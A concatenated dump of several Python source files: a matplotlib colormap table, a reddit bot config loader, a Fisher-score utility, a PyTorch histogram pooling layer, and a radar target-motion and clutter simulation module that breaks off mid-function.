[0.5647639215686275, 0.1435929411764706, 0.4530321568627451],
[0.5751623529411765, 0.14122588235294117, 0.4525882352941176],
[0.5854600000000001, 0.13891686274509804, 0.45208627450980393],
[0.5957, 0.1366078431372549, 0.4515843137254902],
[0.6058529411764706, 0.13429882352941178, 0.45108235294117643],
[0.6158921568627451, 0.13198980392156864, 0.45062431372549017],
[0.6258870588235295, 0.1296807843137255, 0.45017843137254904],
[0.6357811764705883, 0.12737176470588235, 0.44972117647058824],
[0.6455745098039215, 0.1251078431372549, 0.4492745098039216],
[0.6553125490196079, 0.12294470588235294, 0.44877254901960784],
[0.6650047058823529, 0.12088235294117647, 0.4482705882352941],
[0.6745960784313725, 0.11896705882352941, 0.4477686274509804],
[0.6840866666666667, 0.11716, 0.44722],
[0.6935235294117648, 0.1154, 0.44666470588235296],
[0.7029129411764705, 0.1137407843137255, 0.44611529411764705],
[0.7122494117647059, 0.11223019607843138, 0.4455129411764706],
[0.7215376470588235, 0.11092117647058823, 0.4449105882352941],
[0.7307250980392157, 0.10976509803921569, 0.4442596078431372],
[0.7399098039215686, 0.10875882352941177, 0.4435078431372549],
[0.7490964705882353, 0.10795411764705883, 0.44265529411764704],
[0.7582819607843136, 0.10745058823529412, 0.4416521568627451],
[0.7675180392156862, 0.10830392156862745, 0.44009607843137255],
[0.7767035294117648, 0.11127294117647059, 0.4377847058823529],
[0.7858901960784314, 0.11585098039215687, 0.43491960784313727],
[0.7950235294117647, 0.12173921568627452, 0.43149921568627453],
[0.8040070588235294, 0.12862705882352943, 0.42768117647058823],
[0.8129419607843137, 0.13637686274509803, 0.4235572549019608],
[0.8217192156862745, 0.14518705882352942, 0.4189776470588235],
[0.8302999999999999, 0.15489411764705882, 0.41405294117647057],
[0.8386733333333334, 0.16509333333333331, 0.4089266666666667],
[0.8468517647058824, 0.17570235294117648, 0.40359882352941173],
[0.8548211764705882, 0.1869235294117647, 0.398015294117647],
[0.8625427450980392, 0.19885019607843138, 0.39212941176470584],
[0.8699529411764706, 0.2115372549019608, 0.3858862745098039],
[0.877070588235294, 0.22486470588235294, 0.3793505882352941],
[0.8839309803921569, 0.23864039215686272, 0.37255764705882355],
[0.8904890196078432, 0.2527070588235294, 0.365518431372549],
[0.8968011764705882, 0.26680588235294117, 0.3583905882352941],
[0.9029117647058824, 0.28091764705882355, 0.3512058823529412],
[0.9087635294117647, 0.2951874509803922, 0.343863137254902],
[0.9143129411764706, 0.30965882352941176, 0.3363764705882353],
[0.9195599999999999, 0.324389803921569, 0.32867294117647056],
[0.924504705882353, 0.3394231372549019, 0.32078392156862745],
[0.9291470588235294, 0.35469999999999996, 0.31273529411764706],
[0.9334278431372549, 0.370178431372549, 0.3044850980392157],
[0.9373650980392156, 0.38591803921568624, 0.29597372549019607],
[0.9410000000000001, 0.4019, 0.28728],
[0.9443325490196078, 0.4179627450980392, 0.2784250980392157],
[0.9474235294117647, 0.4340862745098039, 0.26942941176470586],
[0.9502517647058824, 0.45024941176470584, 0.2602717647058823],
[0.9527776470588235, 0.46635098039215683, 0.2510356862745098],
[0.955063137254902, 0.48235176470588237, 0.24173764705882353],
[0.9572094117647059, 0.49818941176470594, 0.23240117647058825],
[0.9591921568627451, 0.5137627450980392, 0.22300196078431372],
[0.9610364705882353, 0.529096862745098, 0.2135650980392157],
[0.9627164705882354, 0.544229411764706, 0.20412823529411767],
[0.9642588235294117, 0.5592243137254902, 0.19475529411764705],
[0.9656360784313726, 0.5739898039215686, 0.18541882352941175],
[0.9668764705882353, 0.5885823529411766, 0.1760823529411765],
[0.9679509803921568, 0.6030090196078431, 0.16681098039215686],
[0.9688894117647059, 0.6172341176470588, 0.15764039215686276],
[0.9697270588235294, 0.6312576470588235, 0.1486364705882353],
[0.9704639215686275, 0.6450796078431372, 0.1397678431372549],
[0.9710333333333333, 0.6587000000000001, 0.131],
[0.971535294117647, 0.6720517647058823, 0.1224],
[0.9720372549019607, 0.6851686274509804, 0.11393411764705882],
[0.9724713725490196, 0.6980839215686275, 0.10563686274509804],
[0.9728729411764706, 0.7107294117647058, 0.09747294117647058],
[0.9732745098039216, 0.7231411764705883, 0.08940980392156862],
[0.9736760784313725, 0.7353513725490196, 0.08130941176470588],
[0.9741470588235294, 0.7472905882352942, 0.07324705882352942],
[0.9745792156862745, 0.7589274509803922, 0.06535529411764707],
[0.9749807843137255, 0.7704023529411764, 0.057805490196078425],
[0.9753823529411765, 0.7816352941176471, 0.05065882352941176],
[0.9757839215686275, 0.792636862745098, 0.04391529411764706],
[0.976256862745098, 0.803436862745098, 0.03757490196078427],
[0.9767588235294118, 0.8140352941176471, 0.03156588235294118],
[0.9773329411764705, 0.8243600000000001, 0.02571490196078431],
[0.9780078431372549, 0.8344549019607843, 0.020254901960784354],
[0.9787105882352941, 0.8443482352941176, 0.015371764705882392],
[0.9794866666666667, 0.8541133333333334, 0.011093333333333372],
[0.9803635294117647, 0.8636301960784313, 0.007272156862745059],
[0.9812670588235294, 0.8729929411764706, 0.004076470588235255],
[0.9822450980392157, 0.8822549019607843, 0.0016607843137254822],
[0.9832490196078432, 0.8914160784313726, 0.0002760784313725482],
[0.9841776470588236, 0.9006270588235293, 0.0024094117647058743],
[0.9850811764705882, 0.9097874509803922, 0.008119607843137215],
[0.9859847058823529, 0.9186949019607843, 0.01624274509803914],
[0.9869647058823529, 0.9273, 0.026558823529411607],
[0.9879686274509804, 0.9354490196078431, 0.03824666666666679],
[0.9889725490196078, 0.9432486274509804, 0.05142941176470588],
[0.9899764705882352, 0.9506682352941177, 0.06630235294117647],
[0.9909023529411765, 0.9576066666666666, 0.08242039215686274],
[0.9917274509803922, 0.9642764705882353, 0.0987843137254902],
[0.9925305882352942, 0.9705082352941177, 0.1157],
[0.9934129411764706, 0.9761568627450979, 0.13355882352941176],
[0.994236862745098, 0.9812007843137255, 0.15242549019607804],
[0.99496, 0.9857199999999999, 0.17238000000000037],
[0.9956627450980392, 0.9894941176470589, 0.19328235294117646],
[0.9963654901960785, 0.9925427450980392, 0.21509176470588234],
[0.9971494117647058, 0.9948047058823529, 0.23780823529411765],
[0.9979525490196078, 0.9961788235294118, 0.26159490196078433],
[0.9985917647058823, 0.9968917647058824, 0.28608039215686276],
[0.9988647058823529, 0.9972470588235294, 0.31084117647058784],
[0.9989, 0.9973, 0.33563803921568586],
[0.9986505882352942, 0.997050588235294, 0.36035176470588276],
[0.9981823529411764, 0.9966658823529412, 0.3845470588235298],
[0.9975964705882353, 0.9962643137254903, 0.4080537254901961],
[0.9971627450980393, 0.9958627450980392, 0.43034901960784316],
[0.9970152941176471, 0.9958, 0.45057176470588234],
[0.9970850980392156, 0.9959701960784313, 0.46942823529411765],
[0.9971854901960784, 0.9961709803921568, 0.4875027450980392],
[0.9972858823529411, 0.9964576470588236, 0.5049576470588235],
[0.9974725490196079, 0.9967588235294117, 0.5220666666666667],
[0.9975866666666667, 0.9969733333333333, 0.5387866666666666],
[0.9977741176470588, 0.9972611764705883, 0.5551035294117647],
[0.9978874509803921, 0.9974749019607843, 0.5712796078431372],
[0.9978999999999999, 0.9975878431372549, 0.5874427450980392],
[0.9978999999999999, 0.9976, 0.6034294117647059],
[0.9978999999999999, 0.9976886274509803, 0.6192145098039216],
[0.9978999999999999, 0.9977, 0.6347090196078431],
[0.9978999999999999, 0.9977894117647058, 0.6499011764705882],
[0.9978999999999999, 0.9978, 0.6648807843137255],
[0.9979901960784314, 0.9978901960784313, 0.6796588235294118],
[0.998, 0.9978999999999999, 0.694144705882353],
[0.9980909803921569, 0.9979909803921568, 0.7083282352941177],
[0.9981913725490197, 0.9981827450980392, 0.7223007843137255],
[0.9982917647058823, 0.9982917647058823, 0.7360717647058823],
[0.9984843137254902, 0.9984843137254902, 0.7496411764705883],
[0.9986850980392157, 0.9986850980392157, 0.7630090196078431],
[0.9987929411764707, 0.9987929411764707, 0.7762682352941176],
[0.9989866666666667, 0.9988933333333334, 0.7894266666666666],
[0.999093725490196, 0.9989937254901962, 0.8025780392156863],
[0.9991941176470588, 0.9990941176470588, 0.8157294117647058],
[0.9992, 0.9991, 0.8287862745098039],
[0.9992, 0.9991, 0.8417423529411764],
[0.9992, 0.9991, 0.8546929411764705],
[0.9992, 0.9991, 0.8674521568627451],
[0.9992, 0.9991, 0.8801058823529412],
[0.9992, 0.9991, 0.8926588235294117],
[0.9992, 0.999196862745098, 0.9050141176470589],
[0.9992972549019608, 0.9992972549019608, 0.9172650980392157],
[0.9993, 0.9993, 0.9294152941176471],
[0.9993980392156863, 0.9993980392156863, 0.9414647058823529],
[0.999498431372549, 0.999498431372549, 0.9534133333333333],
[0.9995988235294118, 0.9995988235294118, 0.9651623529411765],
[0.9996992156862745, 0.9996992156862745, 0.9769082352941176],
[0.9997996078431373, 0.9997996078431373, 0.9885545098039216],
[1.0, 1.0, 1.0]]
morgen_colors_r = morgen_colors[::-1]
morgenstemning_cmap = mpl.colors.ListedColormap(morgen_colors, 'morgenstemning')
morgenstemning_r_cmap = mpl.colors.ListedColormap(morgen_colors_r,'inv_morgenstemning')
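# Example (illustrative): the colormaps can be passed directly to matplotlib, e.g.
# plt.imshow(data, cmap=morgenstemning_cmap) or cmap=morgenstemning_r_cmap.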
``` |
{
"source": "joeYeager/reddit-quote-bot",
"score": 3
} |
#### File: reddit-quote-bot/src/config.py
```python
import json
class Config:
def __init__(self,config_file):
with open(config_file) as config_json:
config = json.load(config_json)
self.owner_name = config.get("owner_name", None)
self.version = config.get("version", None)
self.bot_name = config.get("bot_name", None)
self.password = config.get("bot_pass", None)
# A short description of what the bot does
self.description = config.get("description", None)
# The word you would like to cause the bot to trigger
self.summon_word = config.get("summon_word", None)
# Relative file path to the logfile
self.log_file = config.get("log_file", None)
# Relative file path to the quote file
self.quote_file = config.get("quote_file", None)
# Comma-separated list of the subreddits for the bot to operate in
self.subreddits = config.get("subreddits", None)
# How many comments the bot should stream at a time
self.comment_limit = config.get("comment_limit", None)
# Header string
self.header = config.get("header", None)
# Database settings
db = config.get("db", None)
self.db_host = db.get("host", None)
self.db_user = db.get("username", None)
self.db_pw = db.get("password", None)
self.db_name = db.get("database", None)
self.db_table = db.get("table", None)
# The user agent string to be provided to reddit upon establishing a connection
self.user_agent = "{} by u/{} v{} {}".format(self.bot_name, self.owner_name, self.version, self.description)
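# Example config.json (illustrative values; the keys match the lookups above):
# {
#     "owner_name": "someuser", "version": "1.0", "bot_name": "quote-bot",
#     "bot_pass": "***", "description": "replies with quotes",
#     "summon_word": "!quote", "log_file": "logs/bot.log",
#     "quote_file": "data/quotes.txt", "subreddits": "test",
#     "comment_limit": 100, "header": "Quote of the day:",
#     "db": {"host": "localhost", "username": "bot", "password": "***",
#            "database": "quotes", "table": "quotes"}
# }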
``` |
{
"source": "joeyee/Histogram_Layer",
"score": 3
} |
#### File: Histogram_Layer/Utils/Compute_FDR.py
```python
import numpy as np
def Compute_Fisher_Score(features,labels):
#Get index of labels that correspond to each class
Classes = np.unique(labels)
#Get number of instances of each class for P_i
Instances = np.zeros(len(Classes))
for i in range(0,len(Classes)):
Instances[i] = sum(labels==Classes[i])
P_i = Instances/sum(Instances);
#Compute global mean
global_mean = np.mean(features,axis=0)
#For each class compute intra and inter class variations
scores = np.zeros(len(Classes))
log_scores = np.zeros(len(Classes))
for current_class in range(0,len(Classes)):
data = features[labels==Classes[current_class],:]
#Within-class scatter matrix
S_w = P_i[current_class]*np.cov(data.T)
#Between-class scatter matrix
S_b = P_i[current_class]*(np.outer((np.mean(data,axis=0)-global_mean),
(np.mean(data,axis=0)-global_mean).T))
#Compute the score, compute abs of score, only care about magnitude
#compute log of scores if too large
#Using pseudoinverse if singular matrix
try:
scores[current_class] = abs((np.matmul(np.linalg.inv(S_w),S_b)).trace())
except:
scores[current_class] = abs((np.matmul(np.linalg.pinv(S_w),S_b)).trace())
log_scores[current_class] = np.log(scores[current_class])
return scores, log_scores
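# --- Usage sketch (not part of the original file): Fisher score on synthetic
# --- two-class data; shapes and distribution parameters are assumptions. ---
def _demo_fisher_score():
    rng = np.random.RandomState(0)
    features = np.vstack([rng.normal(0, 1, (50, 8)),    # class 0
                          rng.normal(2, 1, (50, 8))])   # class 1
    labels = np.array([0] * 50 + [1] * 50)
    scores, log_scores = Compute_Fisher_Score(features, labels)
    print(scores.shape, log_scores)  # one (log-)score per class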
```
#### File: Histogram_Layer/Utils/LinearHistogramPooling.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
import pdb
class HistogramLayer(nn.Module):
def __init__(self,in_channels,kernel_size,dim=2,num_bins=4,
stride=1,padding=0,normalize_count=True,normalize_bins = True,
count_include_pad=False,
ceil_mode=False):
# inherit nn.module
super(HistogramLayer, self).__init__()
# define layer properties
# histogram bin data
self.in_channels = in_channels
self.numBins = num_bins
self.stride = stride
self.kernel_size = kernel_size
self.dim = dim
self.padding = padding
self.normalize_count = normalize_count
self.normalize_bins = normalize_bins
self.count_include_pad = count_include_pad
self.ceil_mode = ceil_mode
#For each data type, apply two 1x1 convolutions, 1) to learn bin center (bias)
# and 2) to learn bin width
# Time series/ signal Data
if self.dim == 1:
self.bin_centers_conv = nn.Conv1d(self.in_channels,self.numBins*self.in_channels,1,
groups=self.in_channels,bias=True)
self.bin_centers_conv.weight.data.fill_(1)
self.bin_centers_conv.weight.requires_grad = False
self.bin_widths_conv = nn.Conv1d(self.numBins*self.in_channels,
self.numBins*self.in_channels,1,
groups=self.numBins*self.in_channels,
bias=True)
self.bin_widths_conv.bias.data.fill_(1)
self.bin_widths_conv.bias.requires_grad = False
self.hist_pool = nn.AvgPool1d(self.kernel_size,stride=self.stride,
padding=self.padding,ceil_mode=self.ceil_mode,
count_include_pad=self.count_include_pad)
self.centers = self.bin_centers_conv.bias
self.widths = self.bin_widths_conv.weight
# Image Data
elif self.dim == 2:
self.bin_centers_conv = nn.Conv2d(self.in_channels,self.numBins*self.in_channels,1,
groups=self.in_channels,bias=True)
self.bin_centers_conv.weight.data.fill_(1)
self.bin_centers_conv.weight.requires_grad = False
self.bin_widths_conv = nn.Conv2d(self.numBins*self.in_channels,
self.numBins*self.in_channels,1,
groups=self.numBins*self.in_channels,
bias=True)
self.bin_widths_conv.bias.data.fill_(1)
self.bin_widths_conv.bias.requires_grad = False
self.hist_pool = nn.AvgPool2d(self.kernel_size,stride=self.stride,
padding=self.padding,ceil_mode=self.ceil_mode,
count_include_pad=self.count_include_pad)
self.centers = self.bin_centers_conv.bias
self.widths = self.bin_widths_conv.weight
# Spatial/Temporal or Volumetric Data
elif self.dim == 3:
self.bin_centers_conv = nn.Conv3d(self.in_channels,self.numBins*self.in_channels,1,
groups=self.in_channels,bias=True)
self.bin_centers_conv.weight.data.fill_(1)
self.bin_centers_conv.weight.requires_grad = False
self.bin_widths_conv = nn.Conv3d(self.numBins*self.in_channels,
self.numBins*self.in_channels,1,
groups=self.numBins*self.in_channels,
bias=True)
self.bin_widths_conv.bias.data.fill_(1)
self.bin_widths_conv.bias.requires_grad = False
self.hist_pool = nn.AvgPool3d(self.kernel_size,stride=self.stride,
padding=self.padding,ceil_mode=self.ceil_mode,
count_include_pad=self.count_include_pad)
self.centers = self.bin_centers_conv.bias
self.widths = self.bin_widths_conv.weight
else:
raise RuntimeError('Invalid dimension for histogram layer')
def forward(self,xx):
## xx is the input and is a torch.tensor
##each element of output is the frequency for the bin for that window
#Pass through first convolution to learn bin centers: |x-center|
xx = torch.abs(self.bin_centers_conv(xx))
#Pass through second convolution to learn bin widths 1-w*|x-center|
xx = self.bin_widths_conv(xx)
#Pass through relu
xx = F.relu(xx)
#Enforce sum to one constraint
# Add small positive constant in case sum is zero
if(self.normalize_bins):
xx = self.constrain_bins(xx)
#Get localized histogram output, if normalize, average count
if(self.normalize_count):
xx = self.hist_pool(xx)
else:
xx = np.prod(np.asarray(self.hist_pool.kernel_size))*self.hist_pool(xx)
return xx
def constrain_bins(self,xx):
#Enforce sum to one constraint across bins
# Time series/ signal Data
if self.dim == 1:
n,c,l = xx.size()
xx_sum = xx.reshape(n, c//self.numBins, self.numBins, l).sum(2) + torch.tensor(10e-6)
xx_sum = torch.repeat_interleave(xx_sum,self.numBins,dim=1)
xx = xx/xx_sum
# Image Data
elif self.dim == 2:
n,c,h,w = xx.size()
xx_sum = xx.reshape(n, c//self.numBins, self.numBins, h, w).sum(2) + torch.tensor(10e-6)
xx_sum = torch.repeat_interleave(xx_sum,self.numBins,dim=1)
xx = xx/xx_sum
# Spatial/Temporal or Volumetric Data
elif self.dim == 3:
n,c,d,h,w = xx.size()
xx_sum = xx.reshape(n, c//self.numBins, self.numBins,d, h, w).sum(2) + torch.tensor(10e-6)
xx_sum = torch.repeat_interleave(xx_sum,self.numBins,dim=1)
xx = xx/xx_sum
else:
raise RuntimeError('Invalid dimension for histogram layer')
return xx
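# --- Usage sketch (not part of the original file): a 2-D histogram layer on a
# --- random feature map; the channel/bin/window sizes below are assumptions. ---
def _demo_histogram_layer():
    layer = HistogramLayer(in_channels=3, kernel_size=4, dim=2, num_bins=4, stride=4)
    x = torch.randn(1, 3, 32, 32)
    y = layer(x)
    # output has in_channels * num_bins channels of localized bin frequencies
    print(y.shape)  # torch.Size([1, 12, 8, 8])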
``` |
{
"source": "joeyee/MKCF-TBD",
"score": 3
} |
#### File: joeyee/MKCF-TBD/motion_simulation.py
```python
import numpy as np
import matplotlib.pyplot as plt
from scipy.stats import norm,rayleigh
import numpy.linalg as la
from matplotlib.patches import Ellipse
from matplotlib.patches import Rectangle
import kalman_filter_20201029 as kf_model
import jpda_IJOE2016_20201029 as jpda_model
from scipy import ndimage
from scipy.ndimage import rotate
from scipy.stats import chi, chi2
import utilities_200611 as uti # personal tools
def constant_velocity(x0, y0, velo, npoints):
'''
:param x0: start point's x
:param y0: start point's y
:param velo: constant velocity(vx,vy)
:param npoints: number of points
:return:
'''
ts = np.linspace(0, npoints-1, npoints)
vx,vy = velo
xs = x0 + vx*ts
ys = y0 + vy*ts
return xs, ys
def constant_accelerate(x0, y0, velo, acc, npoints):
'''
:param x0: start point's x
:param y0: start point's y
:param velo: initial velocity(vx,vy)
:param acc: constant accelerate
:param npoints: number of points
:return: trajectory of xs, ys
'''
ts = np.linspace(0, npoints-1, npoints)
vx,vy = velo
ax,ay = acc
xs = x0 + vx*ts + (ts**2)*ax/2
ys = y0 + vy*ts + (ts**2)*ay/2
return xs, ys
def constant_turn(x0, y0, radius, omega, npoints):
'''
:param x0: start point's x
:param y0: start point's y
:param radius: radius of turning
:param omega: constant turning rate
:return:trajectory
'''
ts = np.linspace(0, npoints-1, npoints)
xs = x0 + np.sin(omega*ts)*radius
ys = y0 + np.cos(omega*ts)*radius
return xs, ys
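# --- Usage sketch (not part of the original file): generate and plot the three
# --- basic motion models; start points and parameters are illustrative assumptions. ---
def _demo_motion_models():
    xs_cv, ys_cv = constant_velocity(0, 0, (2, 1), 30)
    xs_ca, ys_ca = constant_accelerate(0, 50, (2, -1), (0.1, 0.2), 30)
    xs_ct, ys_ct = constant_turn(50, 50, radius=40, omega=0.1, npoints=30)
    plt.plot(xs_cv, ys_cv, '.', label='CV')
    plt.plot(xs_ca, ys_ca, '.', label='CA')
    plt.plot(xs_ct, ys_ct, '.', label='CT')
    plt.legend()
    plt.show()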
def get_orientation(xs,ys):
'''
Get velocity based on the locations,
Using the velocity to compute the orientation.
:param xs:
:param ys:
:return:
'''
dys = np.diff(ys)
dxs = np.diff(xs)
#compute the orientation of the extended target by velocity.
thetas_less = np.arctan2(dys, dxs) # len(dxs) - 1
thetas = np.pad(thetas_less, (0, 1), 'edge') # add one elements to the end
return thetas
def s_manuver():
'''
An S-type maneuvering trajectory, composed of CV, CA, CV and CT segments.
:return: trajectories
'''
x0 = 10
y0 = 30
#velo= (2*2, -1*2)
velo = (5 * 2, -1 * 2)
npoints = 10
x1s, y1s = constant_velocity(x0, y0, velo, npoints)
x0= x1s[-1]
y0= y1s[-1]
#velo = (1*2,1*2)
velo = (2 * 2, 4 * 2)
acc = (-0.25,1)
npoints = 8
x2s, y2s = constant_accelerate(x0, y0, velo, acc, npoints)
x0 = x2s[-1]
y0 = y2s[-1]
#velo = (1*2, 1*2)
velo = (5 * 2, 2 * 2)
npoints = 10
x3s, y3s = constant_velocity(x0, y0, velo, npoints)
radius = 30
omega = 0.3
npoints =12
x0 = x3s[-1]+4 - radius*np.sin(omega)
y0 = y3s[-1] - radius*np.cos(omega)
x4s,y4s = constant_turn(x0, y0, radius, omega, npoints)
xs = x1s.tolist() + x2s.tolist() + x3s.tolist() + x4s.tolist()
ys = y1s.tolist() + y2s.tolist() + y3s.tolist() + y4s.tolist()
fig, ax = plt.subplots()
w1t = 15
h1t = 9
npoints = len(xs)
ws = np.random.normal(w1t, 0.5, npoints)
hs = np.random.normal(h1t, 0.5, npoints)
dys = np.diff(ys)
dxs = np.diff(xs)
#compute the orientation of the extended target by velocity.
thetas_less = np.arctan2(dys, dxs) # len(dxs) - 1
thetas = np.pad(thetas_less, (0, 1), 'edge') # add one elements to the end
# # visualize the trajectory of the extended target
plot_ellipse(ax, xs, ys, ws, hs, facecolor='green')
plt.show()
#
# tx = [str(i) for i in range(1,len(xs)+1)]
# show_text(xs, ys, tx) #show text
# plot_trajectory(xs,ys,'green') #draw trajectory
return xs,ys,ws,hs,thetas
'''
# This is an example from the ndimage, to compute the Gaussian kernel.
def _gaussian_kernel1d(sigma, order, radius):
"""
Computes a 1D Gaussian convolution kernel.
"""
if order < 0:
raise ValueError('order must be non-negative')
p = numpy.polynomial.Polynomial([0, 0, -0.5 / (sigma * sigma)])
x = numpy.arange(-radius, radius + 1)
phi_x = numpy.exp(p(x), dtype=numpy.double)
phi_x /= phi_x.sum()
if order > 0:
q = numpy.polynomial.Polynomial([1])
p_deriv = p.deriv()
for _ in range(order):
# f(x) = q(x) * phi(x) = q(x) * exp(p(x))
# f'(x) = (q'(x) + q(x) * p'(x)) * phi(x)
q = q.deriv() + q * p_deriv
phi_x *= q(x)
return phi_x
'''
def gaussian_kernel2d(sigma_x, sigma_y, theta, bnorm=True):
'''
Return a 2d Gaussian kernel template (2d matrix).
:param sigma_x:
:param sigma_y:
:param theta: rotation theta of 2d Gaussian
:return: Gaussian Kernel Template.
'''
kernel_wr = int(sigma_x * 2.5 + 0.5)
kernel_hr = int(sigma_y * 2.5 + 0.5)
#if kernel_hr < 5 or kernel_wr < 5:
# raise ValueError('kernel width and/or height are too small')
kx = np.arange(-kernel_wr, kernel_wr + 1)
ky = np.arange(-kernel_hr, kernel_hr + 1)
KX, KY = np.meshgrid(kx, ky)
theta = -1*theta
a = np.cos(theta) ** 2 / (2 * sigma_x ** 2) + np.sin(theta) ** 2 / (2 * sigma_y ** 2)
b = -np.sin(2 * theta) / (4 * sigma_x ** 2) + np.sin(2 * theta) / (4 * sigma_y ** 2)
c = np.sin(theta) ** 2 / (2 * sigma_x ** 2) + np.cos(theta) ** 2 / (2 * sigma_y ** 2)
# f(x,y)=Aexp(−(a(x−xo)2+2b(x−xo)(y−yo)+c(y−yo)2)) , here xo=0, yo=0
# f(x,y)=Aexp(−(ax^2+2bxy+cy^2))
# a = cos2θ2σ2X + sin2θ2σ2Y
# b =−sin2θ4σ2X + sin2θ4σ2Y
# c = sin2θ2σ2X + cos2θ2σ2Y
kgauss = np.exp(-(a * KX ** 2 + 2 * b * KX * KY + c * KY ** 2))
if bnorm:#normalization in default mode.
kgauss = kgauss / np.sum(kgauss)
return kgauss
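# --- Usage sketch (not part of the original file): build a rotated 2-D Gaussian
# --- kernel and check its normalization; the sigmas and angle are assumptions. ---
def _demo_gaussian_kernel2d():
    k = gaussian_kernel2d(sigma_x=6.0, sigma_y=3.0, theta=np.pi / 6)
    print(k.shape, k.sum())  # odd-sized kernel, sum ~= 1.0 when bnorm=True
    plt.imshow(k)
    plt.show()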
local_snrs = []
global_snrs = []
#constant_template = gaussian_kernel2d(8,4,0)
dec_str = [12 , 11 , 10 , 9 , 8 , 7 , 6 , 5 , 4 , 3 , 2 , 1 , 0 , -1 , -2 ]
def add_gaussian_template_on_clutter(cx, cy, w, h, theta, erc, snr, clutter_background, swerling_type=0):
# Erc: average clutter energy.
# Erc = np.sum(clutter_background ** 2) / clutter_background.size
sigma_x = (w / 2.5 - 0.5) / 2 #sigma_x is related to the width of the template
sigma_y = (h / 2.5 - 0.5) / 2
kgauss = gaussian_kernel2d(sigma_x, sigma_y, theta) # Get diffusive coefficients for a 2d gaussian
# kh_big,kw_big = kgauss_big.shape[:2]
# kh,kw = [int(kh_big/2), int(kw_big/2)]
# kly,klx = [int(kh/2), int(kw/2)]
# kgauss = kgauss_big[kly:kly+kh, klx:klx+kw]
Egk_numer = np.sum(kgauss.ravel() ** 2) / kgauss.size # 2d gaussian's average power.
h_t, w_t = kgauss.shape
ly = int(cy - (h_t - 1) / 2)
ry = int(cy + (h_t - 1) / 2)
lx = int(cx - (w_t - 1) / 2)
rx = int(cx + (w_t - 1) / 2)
img_h, img_w = clutter_background.shape
if ly < 0 or lx < 0 or ry > img_h or rx > img_w:
raise ValueError('template location is beyond the image boundaries!')
bk_roi = clutter_background[ly:ly + h_t, lx:lx + w_t]
# compute the amplitude coefficients according to the SNR Eq.
kcoef_global = np.sqrt(np.power(10, (snr / 10)) * erc / Egk_numer)
# average power of clutter is computed by numerical results in local roi-window.
erc_local = np.sum(bk_roi ** 2) / bk_roi.size
kcoef_local = np.sqrt(np.power(10, (snr / 10)) * erc_local / Egk_numer)
kcoef = kcoef_global
if swerling_type == 0: # swerling type 0 target
kcoef_t = kcoef
template = kgauss * kcoef_t
if swerling_type == 1:
sigma = kcoef # /np.sqrt(2)
# central amplitude obeys the rayleigh distribution, which 2*sigma^2 = sigma_t = kcoef**2 (swerling_0's Amplitude)
kcoef_t = rayleigh.rvs(loc=0, scale=sigma, size=1)
template = kgauss * kcoef_t
if swerling_type == 3: # central amplitude obeys the chi distribution, which degrees of freedom k=4.
kcoef_t = chi2.rvs(df=kcoef, size=1) # or kcoef_t = chi2.rvs(df=kcoef, size=1), then template=kgauss*kcoef
template = kgauss * (kcoef_t) # for chi2, Mean=df.
# Get the decrease coefficient to make sure the inner Gaussian template satisfies the SNR requirement.
tcx, tcy = w_t/2, h_t/2
snr_lis= list(range(12, -3, -1)) # [12, 11, ..., -1, -2]
# shrink rate, take from cfar results.
snr_lis= [12 , 11 , 10 , 9 , 8 , 7 , 6 , 5 , 4 , 3 , 2 , 1 , 0 , -1 , -2 ]
wr_lis = [1.62, 1.67, 1.65, 1.76, 1.80, 2.00, 2.20, 2.30, 3.20, 3.50, 3.70, 3.90, 4.00, 4.2, 4.5]
hr_lis = [0.88, 0.89, 0.90, 0.92, 1.00, 1.10 ,1.20, 1.20, 1.55, 1.55, 1.65, 1.70, 1.75, 2.0, 2.5]
decs = [0.77, 0.76, 0.75, 0.74, 0.73, 0.66, 0.62, 0.61, 0.50, 0.48, 0.42, 0.38, 0.35, 0.28,0.25]
#decrease the size of Gaussian template, similar to the cfar_seg results.
# [cfar shrink the real target, when outside is lower than center]
wr = wr_lis[snr_lis.index(snr)]
hr = hr_lis[snr_lis.index(snr)]
iw, ih = w_t/wr, min(h_t/hr, h_t)
ix, iy, iw, ih = np.int64([tcx-iw/2, tcy-ih/2, iw, ih])
inner_gauss = template[iy:iy+ih, ix:ix+iw]
dec_coef = np.sqrt(np.power(10, (snr / 10)) * erc_local / np.mean(inner_gauss**2))
dec_str[snr_lis.index(snr)] = '%.2f'%dec_coef
dec_coef = decs[snr_lis.index(snr)]
template = template*dec_coef #np.sqrt(1.618) #/2.8 # Make sure that in shrinked (cfar-segmented) target region still holds low snr.
loc_snr = 10 * np.log10(np.sum(template ** 2) / np.sum(bk_roi ** 2))
glob_snr = 10 * np.log10(np.sum(template ** 2) / (erc * template.size))
# print('Swerling Type %d, kcoef_t %.2f (w %d, h %d), extened_egk %.2E' % (swerling_type, kcoef_t, w, h, Egk_numer))
# print('average (target - local clutter) power is (%.2f - %.2f)' % (np.sum(template ** 2) / template.size, erc_local))
# print('Asked snr is %d, simulated local snr is %.2f, simulated global snr is %.2f' % (snr, loc_snr, glob_snr))
#local_snrs.append(loc_snr)
#global_snrs.append(glob_snr)
mask = (template > bk_roi) * template
clutter_background[ly:ly + h_t, lx:lx + w_t] = mask + bk_roi
#clutter_background[ly:ly + h_t, lx:lx + w_t] = template + bk_roi
return clutter_background
def add_gaussian_template_on_clutter_v2(cx, cy, w, h, theta, erc, snr, clutter_background, swerling_type=0):
'''
Rewrite the swerling type's pdf. kgauss is normalized.
:return:
'''
# Erc: average clutter energy.
# Erc = np.sum(clutter_background ** 2) / clutter_background.size
sigma_x = (w/2 - 0.5) / 2 # sigma_x is related to the width of the template
sigma_y = (h/2 - 0.5) / 2
kgauss = gaussian_kernel2d(sigma_x, sigma_y, theta, bnorm=False) # Get diffusive coefficients for a 2d gaussian
Egk_numer = np.sum(kgauss.ravel() ** 2) / kgauss.size # 2d gaussian's average power.
h_t, w_t = kgauss.shape
ly = int(cy - (h_t - 1) / 2)
ry = int(cy + (h_t - 1) / 2)
lx = int(cx - (w_t - 1) / 2)
rx = int(cx + (w_t - 1) / 2)
img_h, img_w = clutter_background.shape
if ly < 0 or lx < 0 or ry > img_h or rx > img_w:
raise ValueError('template location is beyond the image boundaries!')
bk_roi = clutter_background[ly:ly + h_t, lx:lx + w_t]
# compute the amplitude coefficients according to the SNR Eq.
kcoef_global = np.sqrt(np.power(10, (snr / 10)) * erc / Egk_numer)
kcoef_peak = np.sqrt(np.power(10, (snr / 10)) * erc) # point's snr reversion
# average power of clutter is computed by numerical results in local roi-window.
erc_local = np.sum(bk_roi ** 2) / bk_roi.size
kcoef_local = np.sqrt(np.power(10, (snr / 10)) * erc_local / Egk_numer)
